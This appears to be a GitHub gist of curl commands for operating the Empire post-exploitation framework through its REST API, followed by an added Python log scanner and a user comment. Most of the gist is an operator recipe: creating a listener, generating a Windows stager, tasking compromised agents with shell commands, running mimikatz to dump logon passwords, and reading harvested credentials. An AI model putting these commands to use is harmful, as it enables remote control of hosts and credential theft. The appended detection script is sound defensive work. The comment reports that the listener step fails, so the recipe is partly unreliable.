Last active Mar 20, 2020
Empire RESTful API usage
# start empire headless with the specified API username and password
./empire --headless --username empireadmin --password 'Password123!'
# log in and get the current server token (returned in the JSON body of the response)
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/admin/login -X POST -d '{"username":"empireadmin", "password":"Password123!"}'
# store the token in a variable (placeholder: paste the value from the login response)
TOKEN='PASTE_TOKEN_FROM_LOGIN_RESPONSE'
# see listener options
curl --insecure -i https://localhost:1337/api/listeners/options?token=$TOKEN
# create a listener
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/listeners?token=$TOKEN -X POST -d '{"Name":"testing"}'
# verify listener was created
curl --insecure -i https://localhost:1337/api/listeners?token=$TOKEN
# get the stager for this listener
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/stagers?token=$TOKEN -X POST -d '{"StagerName":"launcher", "Listener":"testing"}'
# execute stager on a Windows client
# see registered agents
curl --insecure -i https://localhost:1337/api/agents?token=$TOKEN
# grab the agent name and store it in a variable (placeholder: paste the name from the agents listing)
AGENT='PASTE_AGENT_NAME_FROM_AGENTS_LIST'
# task the agent to run a shell command
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/agents/$AGENT/shell?token=$TOKEN -X POST -d '{"command":"whoami"}'
# task all agents to run a shell command
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/agents/all/shell?token=$TOKEN -X POST -d '{"command":"pwd"}'
# task the agent to run a module
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/modules/credentials/mimikatz/logonpasswords?token=$TOKEN -X POST -d "{\"Agent\":\"$AGENT\"}"
# clear all agent taskings
# curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/agents/all/clear?token=$TOKEN
# get agent results
curl --insecure -i https://localhost:1337/api/agents/$AGENT/results?token=$TOKEN
# get all agent results
curl --insecure -i https://localhost:1337/api/agents/all/results?token=$TOKEN
# clear all agent result buffers
curl --insecure -i https://localhost:1337/api/agents/all/results?token=$TOKEN -X DELETE
# see stored credentials
curl --insecure -i https://localhost:1337/api/creds?token=$TOKEN
# rename the agent
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/agents/$AGENT/rename?token=$TOKEN -X POST -d '{"newname":"newagent"}'
# kill the agent
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/agents/newagent/kill?token=$TOKEN -X POST
# confirm kill
curl --insecure -i https://localhost:1337/api/agents?token=$TOKEN
# get any stale agents
curl --insecure -i https://localhost:1337/api/agents/stale?token=$TOKEN
# remove stale agents
curl --insecure -i https://localhost:1337/api/agents/stale?token=$TOKEN -X DELETE
# restart the server
curl --insecure -i https://localhost:1337/api/admin/restart?token=$TOKEN
# kill all listeners
curl --insecure -i https://localhost:1337/api/listeners/all?token=$TOKEN -X DELETE
# shut down the server
curl --insecure -i https://localhost:1337/api/admin/shutdown?token=$TOKEN
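Added defender-side example, not part of the gist: the Python below scans constructed HTTP access-log lines for the API paths the gist exercises and flags that the session token travels in the query string, where proxies and web servers record it. The log format and sample lines are constructed; the paths are the ones used above.

```python
"""Flag Empire REST API activity, and API tokens leaked into URLs, in HTTP access logs."""
import re
from urllib.parse import parse_qs, urlsplit

# Paths driven by the gist above; any hit in proxy or web-server logs is worth
# an analyst's attention, especially on the default port 1337.
EMPIRE_API_PATHS = (
    "/api/admin/login", "/api/admin/restart", "/api/admin/shutdown",
    "/api/listeners", "/api/stagers", "/api/agents", "/api/modules", "/api/creds",
)

# Constructed log format: <client> "<METHOD> <absolute URL>" <status>
LOG_RE = re.compile(r'^(?P<src>\S+) "(?P<method>[A-Z]+) (?P<url>\S+)" (?P<status>\d{3})$')


def classify(line):
    """Return a finding dict if the line looks like Empire API traffic, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["url"])
    if not any(parts.path == p or parts.path.startswith(p + "/") for p in EMPIRE_API_PATHS):
        return None
    token = parse_qs(parts.query).get("token", [None])[0]
    return {
        "src": m["src"],
        "method": m["method"],
        "port": parts.port,
        "path": parts.path,
        "token_in_url": token is not None,
        # The token is a credential: keep only a short fingerprint in the finding.
        "token_fp": (token[:4] + "...") if token else None,
    }


def scan(lines):
    """Run classify() over every line and keep the findings."""
    return [f for f in (classify(l) for l in lines) if f]


# Constructed sample lines: three Empire API calls and one unrelated request.
SAMPLE_LOG = [
    '10.0.0.5 "POST https://localhost:1337/api/admin/login" 200',
    '10.0.0.5 "POST https://localhost:1337/api/listeners?token=abcd1234" 200',
    '10.0.0.5 "GET https://localhost:1337/api/agents/all/results?token=abcd1234" 200',
    '10.0.0.9 "GET https://intranet.example/api/health" 200',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```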

@rajiv2790 rajiv2790 commented May 2, 2018

When I do a POST to create a listener, I am getting the error message "Method not allowed". I think you have missed the listener type in the POST URL.
